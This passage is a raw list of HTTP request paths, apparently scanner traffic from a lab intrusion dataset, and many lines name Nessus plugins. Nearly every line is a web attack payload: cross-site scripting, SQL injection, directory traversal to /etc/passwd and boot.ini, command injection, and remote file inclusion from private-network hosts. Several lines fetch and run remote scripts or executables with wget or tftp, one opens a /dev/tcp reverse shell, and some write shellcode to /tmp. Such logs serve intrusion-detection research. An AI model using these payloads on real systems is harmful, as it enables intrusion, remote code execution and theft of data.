content=\"testlwwz=718\">\n/main.php?logout=\"&ver,>q76194966&rem,\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/examples/jsp/num/save.php?file_save=/etc/passwd\n/examples/servlets/servlet/search.pl?form=../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/scgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/zln2hm2z.cfm?<script>document.cookie=\"testblcp=8120;\"</script>\n/examples/servlets/servlet/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/en-us/7o5qp766.idc?<script>cross_site_scripting.nasl</script>\n/ewc3rz1l.php?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/javascript/home.exe\n/examples/jsp/colors/phpnews/sendtofriend.php?mid='1'\n/scripts/config.php?path[docroot]=/etc/passwd\\x00\n/ydexw8by.htm?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/templates/prescription/?d=a\n/q703m78q.php?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/manager/smpwservicescgi.exe\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggrtsnqsopipvcae4qd5bx3waa/rzemxyjqrg.sh;echo|awstats422602.txt\n/cgi-bin/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/w4996nr0.nsf?<script>document.cookie=\"testttvs=7163;\"</script>\n/main.php?stuff=\"&ver;>q68954445&rem;\n/en-us/7o5qp766.htm?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0adel q64819443 #\n/_mmserverscripts/mmhttpdb.asp\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1978396456,0,0,0,0,0--\n/examples/jsp/checkbox/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/ju0u7kfo.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0duname\\x09#\n/javascript/private.exe\n/xssoverview/\n/scanned.exe\n/cgi-bin/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/scripts/lce0cbkfb8xx.shtml\n/scripts/admin/login-default.do\n/examples/jsp/jsp2/jspx/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/main.php?logout=\\x0duname >q39267414 #\n/main.php?stuff=\"ver,>q26668686&rem,\n/cgi-perl/.htpasswd\n/txwebservice/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0\n/javascript/.passwd.c\n/examples/jsp/checkbox/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/examples/jsp/error/config.php?returnpath=/etc/passwd\\x00\n/javascript/thumb.exe\n/mv8wxfy9.jspa?<script>document.cookie=\"testrhbc=8184;\"</script>\n/q703m78q.exe?<script>document.cookie=\"testvowq=604;\"</script>\n/top.php?stuff=\"&del\\x0cq43992942&rem\\x0c\n/d7ktpmcq.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8t9v8k7x.htm?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1332010414,607312942 --\n/lmw4r201.pl?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/j2kdmfw4.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/x2gyorli.html?<script>document.cookie=\"testwhac=3130;\"</script>\n/8t9v8k7x.dll?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/search.php?searchstring=<script>alert(document.cookie)</script>\n/nyjgaorz.do?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/en-us/accountfaq.php?skin=../../admin/manager&tplpath=admin\n/ygkjkngd.kspx?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/manager/index.php?templates_dir=/etc/passwd\\x00\n/ewc3rz1l.pl?<script>document.cookie=\"testkgqo=204;\"</script>\n/main.php?stuff=\"&ver\\x0c>q69516617&rem\\x0c\n/help.php?q=\"ver;>q28828634&rem;\n/6wb70v0b.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n../../flags/iwvsggrh.txt\n/javascript/oem.exe\n/main.php?stuff=\"\\x0drm q77128449 #\n/l4fz1dqw.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/detail.asp?nchannel='1\n/oie504mr.x?<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/jsp2/el?username=\"<script>foo</script\n/en-us/jnv890lt.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/help.php?q='\\x0asleep 10 #\n/scripts/shop.plx/page=nessus654214114\n/top.php?stuff=\"&ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/help.php?q='uname >q24159687 #\n/search.asp?searchtxt=\"><script>alert(414446083577)</script><\"&catid=&search=search&searchtype=0\n/help.php?q='&sleep\\x098\\x09#\n/comments.php?scriptpath=http://192.168.202.96:8080/swgnhpydbq0t??\n/u95h6ymu.fts?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/vmi8bb12.php3?<script>document.cookie=\"testlerc=2575;\"</script>\n/ie777.exe/\n/scgi-bin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/cacti/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/print.php?what=article&id='\n/javascript/polls.exe\n/fc9t54l7.htm?<script>document.cookie=\"testggad=2000;\"</script>\n/main.php?stuff=\"&ver\\xa0>q65461871&rem\\xa0\n/help.php?q='&uname >q89912813 #\n/javascript/htpasswd.aspx\n/scripts/index.php?post=../config/password\n/copying/document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q83354951%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/h5i6crm3.cfm?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/staff attorney job description november 2006/\n/cgi-sys/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/manager/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/top.php?stuff=\"\\x0asleep\\x0911\\x09#\n/en-us/fo564rei.php3?<script>cross_site_scripting.nasl</script>\n/yppasswd/\n/help.php?q='\\x0arm\\x09q61575727\\x09#\n<script>document.cookie=\"testnofv=4170;\"</script>\n/cacti/doc/index.php?s=/etc/passwd\\x00\n/examples/jsp/jsp2/el/save.php?file_save=/etc/passwd\n/examples/jsp/checkbox/viewcvs.cgi/?cvsroot=<script>foo</script>\n/scripts/tinfo.php?id=1332008638\n/main.php?logout=\"ping,-w,9000,-n,1,1.2.3.4&rem,\n/m2fpztty.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ver\\x0b>q12768472&rem\\x0b\n/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/zz5thkvtmlgl??cmd=id;pwd\n/j4oqyvga.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptioninfo/\n/7uz3ok60.jsp?<script>cross_site_scripting.nasl</script>\n/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"\\x0drm q87848513 #\n/main.php?logout=\\x0auname\\x09>q41579935\\x09#\n/examples/servlets/servlet/download.php?language=/etc/passwd\\x00\n/main.php?stuff=\"ver\\x0b>q27764952&rem\\x0b\n/javascript/frames.exe\n/help.php?q='&sleep 8 #\n/scripts/default.aspx\n/i7prbs22.asp?<script>document.cookie=\"testjnre=7328;\"</script>\n/lmw4r201.cfc?<script>document.cookie=\"testwews=8477;\"</script>\n/aj3pf49c.pl?<script>document.cookie=\"testnofv=4170;\"</script>\n/d7ktpmcq.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331919174')</script>\n/freddy vs jason movie script/\n/zpanel.php?page=/etc/passwd\\x00\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1340614335,0,0,0,0,0--\n/scripts/mini_logger.cgi\n/examples/jsp/sessions/webplus?script=/../../../../etc/passwd\n/en-us/account/doc/index.php?s=/etc/passwd\\x00\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/frznctvhi0i5?\n/kpasswd/\n/7u1pb2xi.htm?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/\"julie roehm\"/\n/scripts/d3z7yywpyeoa.sh\n/examples/jsp/error/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/iv5vkgam.html?<script>document.cookie=\"testfosd=94;\"</script>\n/i2n4v4rl.pl?<script>cross_site_scripting.nasl</script>\n/scripts/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/en-us/7o5qp766.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zroo33l4.kspx?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/examples/jsp/jsp2/jspx/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/scripts/t769qwej0llr.sh\n/javascript/contact.exe\n/dda2qr7j.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yver8r9o.idc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--\n/6dlc2zm9.kspx?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n//</p><body><script/src=\"http://www.example.com/test?rnd=q71274247\"></script><p>\n/examples/jsp/jsp2/el/htgrep/file=index.html&hdr=/etc/passwd\n/manager/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/javascript/replicas.exe\n/fnwhrxyd.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9kr0ih0v.idc?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/jsp/colors/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/vjbrrppi.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/manager/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/main.php?logout=del;q21667624&rem;\n/j2kdmfw4.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/052004transcript/\n<script>document.cookie=\"testexuu=5340;\"</script>\n/lsoix5h3.fts?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testsixi=8451;\"</script>\n/l752x1ry.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\";del\\x09q86216423\\x09#\n/include/scripts/send_email_cache.php?dir=@rfiurl\n/en-us/jnv890lt.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/htgrep/file=index.html&hdr=/etc/passwd\n/top.php?stuff=\"&rm q95298396 #\n/help.php?q=\"&del\\x09q98836719&rem\\x09\n/main.php?stuff='\\x0arm\\x09q89799943\\x09#\n/examples/servlets/servlet/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/recordings/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/ywaxntrx.dll?<script>cross_site_scripting.nasl</script>\n/quagynka.aspx?<script>cross_site_scripting.nasl</script>\n/nuh3zirz.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/33y9gcqq.php3?<script>document.cookie=\"testnvxc=4301;\"</script>\n/main.php?logout=';rm\\x09q79392194\\x09#\n/cacti/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/top.php?stuff=\\x0duname\\x09>q35433541\\x09#\n/phpmyadmin/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/1r8cfrlf.html?<script>document.cookie=\"testydan=5106;\"</script>\n/javascript/button.exe\n/scripts/apgafvcxoeeh.php3\n/graf engraves holbein's dance of death on knives 1521/\n/ao22ww7y.mscgi?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/b1q8bywu.htm?<script>cross_site_scripting.nasl</script>\n/recordings/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/top.php?stuff='rm\\x09q39954515\\x09#\n/examples/jsp/jsp2/jspx/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/ao22ww7y.x?<script>document.cookie=\"testqppc=8767;\"</script>\n/weq93ppb.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7o5qp766.idc?<script>cross_site_scripting.nasl</script>\n/rpc/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/src/login.php\n/eei78ore.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/php.cgi?/etc/passwd\n/examples/jsp/cal/hw3.cgi?daysonly=0).system('id').(\n/nyjgaorz.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/scripts/rx9ysf2iwv4j.php\n/javascript/dirs.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/cexxamcdtz.sh+>+/dev/null+&'); function v\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../vtigerservice.php\\x00\n/manager/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+5e+30+00+00+00+00+00+00+4b+45+52+4e+45+4c+33+32+2e+64+6c+6c+00+00+00+00+4c++>>ctdn\n/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/ghl9il?\n/help.php?q=&ver\\x0b>q52742886&rem\\x0b\n/phpmyadmin/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/phpmyadmin/search.jsp?q=%\"<script>alert(1331904374)</script>\n/top.php?stuff=\"|ping -w 7000 -n 1 1.2.3.4|rem \n/help.php?q=\"del q85487167&rem \n/bl8sefdm.cfc?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/index.php?id='union/**/select/**/0,0,1738276559,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/<nbbbjgeagjaklidbkjopmeflapac/\n/unscripted/\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--\n/scripts/zbkhkr.exe?/x+/c+tftp -i 192.168.202.96 get twvcumel vjdqbbls.exe\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331908874,150489293 --\n/scripts/form.php\n/javascript/junk.exe\n/m4kkjf8l.html?<script>document.cookie=\"testyglc=8988;\"</script>\n/main.php?stuff=\"|ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/recordings/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/iajtej82.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6qbynt4f.php?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?act=help&do=aboutoat\n/t3af3tdz.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/cal_week.php?op=week&catview=999'\n/top.php?stuff=\"\\x0drm\\x09q41641295\\x09#\n/igtf0zon.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/test-cgi.exe\n/top.php?stuff=;del\\x09q62254247\\x09#\n/d44uk9h2.asp?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/main.php?stuff=\"&del\\x09q91551817\\x09#\n/6n7aacgg.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a_hrefhttpw3bmttuenlnlmensenbmtscriptpubinsectionphppublicationsa/\n/main.php?logout=ver\\xa0>q16264122&rem\\xa0\n/scriptpage/source/includes/load_forum.php?mfh_root_path=@rfiurl\n/examples/jsp/error/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/examples/jsp/num/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/examples/jsp/colors/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/en-us/account/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/examples/jsp/cal/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/javascript/15.exe\n/jdx255ea.php3?<script>document.cookie=\"testziyq=5055;\"</script>\n/cacti/view_user.php?list=1&letter=&sort_by='select\n/examples/jsp/cal/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/examples/jsp/sessions/misc/audio.php?recording=../version.inc\n/category.php?id='411836083446\n/secure.php?cfgprogdir=/etc/passwd\\x00\n/aoy7kzbh.htpasswd\n/javascript/found.exe\n/nmw0do67.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/server_status.php/\"><script>alert(414646114329)</script>\n/flysprayxss/\n/scripts/prnnucptkixl.php3\n/help.php?q=\"del q43721567&rem \n/shop/normal_html.cgi?file=&lt;script&gt;alert(\\\"vulnerable\\\")&lt;/script&gt;\n/v3axg1p8.htm?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/modules.php?name=network_tools&file=index&func=ping_host&hinput=;id\n/esmozg5d.exe?<script>cross_site_scripting.nasl</script>\n/en-us/s7qus4g3.php?<script>cross_site_scripting.nasl</script>\n/javascript/phf.exe\n/products_datingscripts/\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008637')</script>\n/fmnveedu.fts?<script>document.cookie=\"testgfbr=7014;\"</script>\n/cgi-bin/search.jsp?q=%\"<script>alert(1331919151)</script>\n/help.php?q=\"&sleep\\x0910\\x09#\n/recordings/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/fa8p8lr8.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rubrique.asp?no=/etc/passwd|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/odzk29aa.pl?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200\n/sparkleblogxss/\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/smallscript/\n/viewers/txt.php?filename=../../../../../../../../../../boot.ini\\x00\n/cgi-exe/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/main.php?stuff=\"ver&rem;\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,416276020,64888377,1,1,1,1,1--&blogid=1\n/en-us/account/texis.exe/nessus\n/javascript/horde.exe\n/examples/jsp/error/sendcard.php?view=1&id='sendcard_sql.nasl\n/cacti/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/scripts/n4p4f4gtbhia.asp\n/d44uk9h2.aspx?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/king's live/\n/examples/jsp/jsp2/jspx/phpnews/sendtofriend.php?mid='1'\n/twiki/bin/view/main/twikiusers?rev=86913 `0<&101-;exec 101<>/dev/tcp/192.168.202.118/10920;sh <&101 >&101 2>&101`#\n/g3w7y7u5.exe?<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/jsp/jsp2/el/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/main.php?logout=\"|ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/top.php?stuff=\"\\x0duname #\n/scripts/shell/sitecore.version.xml\n/top.php?stuff=&ver&rem;\n/fo564rei.htm?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331923203,1746193209 --\n/en-us/<script>cross_site_scripting.nasl</script>.pl\n/examples/jsp/jsp2/el/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/examples/jsp/jsp2/el/javascript.php?abs_path=/etc/passwd\\x00\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/colors/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/help.php?q=\"ver&rem\\xa0\n/6qbynt4f.idc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/viewsource?/etc/passwd\n/e9rx3ya4.exe?<script>cross_site_scripting.nasl</script>\n/php/mylog.html?screen=/etc/passwd\n/search?ns-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/javascript/.passwd.jhtml\n/scripts/csv_db.cgi?file=|id|\n/main.php?stuff='\\x0ddel q97623189 #\n/examples/jsp/error/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/scripts/ion-p.exe?page=../../../../../etc/passwd\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1\n/b4vng02k.jspa?<script>document.cookie=\"testtrlh=3672;\"</script>\n/script/tick/allincludefortick.php?path_to_code=http://192.168.202.96:8080/4dckqcc0acprbz?\n/zmvq66jy.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=uname\\x09>q94372574\\x09#\n/cgi/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/user.php\n/help.php?q=\"ver\\x09>q83132484&rem\\x09\n/recordings/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/en-us/account/index.php?search=<script>foo</script>\n/vac1l5vm.cgi?<script>cross_site_scripting.nasl</script>\n/script_path/config.inc.php?_path=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/main.php?stuff=ping;-w;7000;-n;1;4.3.2.1|rem;\n/examples/jsp/jsp2/jspx/htmlscript?../../../../../../../../../etc/passwd\n/modules.php?op=modload&name=news&file=index&catid=\"1\" and force_error=error\n/taulvcvfro.exe\n/examples/jsp/sessions/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908853\n/examples/jsp/jsp2/el/index.php?cat='\n<meta http-equiv=set-cookie content=\"testvowq=604\">\n/examples/jsp/error/index.php?cat='\n/forum_members.asp?find=\";}alert(9823);function x(){v =\"\n/0w155a7c.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/qczkquis.do?<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/servlets/servlet/file.php?path=/etc/passwd\\x00\n/examples/servlets/servlet/sgdynamo.exe?htname=<script>foo</script>\n/edzaia0i.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zmvq66jy.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=&ping;-w;10000;-n;1;1.2.3.4&rem;\n/scripts/index.php?src=1&_common=1&time=1331909415&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>\n/zln2hm2z.pl?<script>document.cookie=\"testblcp=8120;\"</script>\n/cacti/starnet/addons/slideshow_full.php?album_name='735641761\n/i7prbs22.idc?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/mpcgi/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/examples/jsp/num/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/ambien-prescription/\n/top.php?stuff=\"rm,q89398857&rem,\n/top.php?stuff=\"ping;-w;8000;-n;1;1.2.3.4|rem;\n/main.php?stuff=\"&ver\\x0c>q99279396&rem\\x0c\n/examples/jsp/error/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/ewc3rz1l.php?<script>document.cookie=\"testkgqo=204;\"</script>\n/examples/servlets/servlet/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/ao22ww7y.php3?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/main.php?logout=\"&ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/vir0v3xfc?\n/edv3mapy.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n1afe1y6.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/what's_wowpens/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/rlfsfoelhy;\"\n/main.php?stuff=\"|ping;-w;10000;-n;1;1.2.3.4|rem;\n/scripts/rihzp7swr3p6.pl\n/b4vng02k.x?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/&#xc9;cole_communication/\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/ghl9il??\n/trades_description/\n/phpmyadmin/search.jsp?q=%\"<script>alert(1331904373)</script>\n/main.php?stuff=';rm q74863224 #\n/vwmg565s.nsf?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/scripts/cevvxrxqxc_b.asp\n/examples/jsp/error/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/en-us/esmozg5d.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7u1pb2xi.cgi?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/help.php?q=;sleep 9 #\n/pxagj7n7.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8x6w469u.aspx?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/examples/jsp/jsp2/el/print.php?what=article&id='\n/odzk29aa.kspx?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/zz5thkvtmlgl??\n/examples/jsp/checkbox/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/javascript/statement.exe\n/b4vng02k.pl?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/scripts/index.php?user_langue=../../../../../../../../../../etc/passwd\n/javascript/wwwuser.exe\n/examples/jsp/colors/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/70's_badluck/\n/examples/jsp/error/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/examples/jsp/error/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/main.php?logout=\"del\\x09q68293964\\x09#\n/examples/jsp/checkboxmultihtml.pl?multi=/etc/passwd\\x00html\n/help.php?q=;rm\\x09q16213317\\x09#\n/javascript/sms.exe\n/cgi-local/sensepost.exe?/c+dir\n/en-us/account/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'--\n/javascript/adclick.exe\n/ao22ww7y.html?<script>document.cookie=\"testqppc=8767;\"</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/vsnlklmgzu0;echo|awstats248410.txt\n/cgi-bin/common/listrec.pl?app=qmh-news&template=;ls /etc|\n/examples/jsp/sessions/rot13sj.cgi?/etc/passwd\n/javascript/blah.exe\n/de3v2dd9.aspx?<img 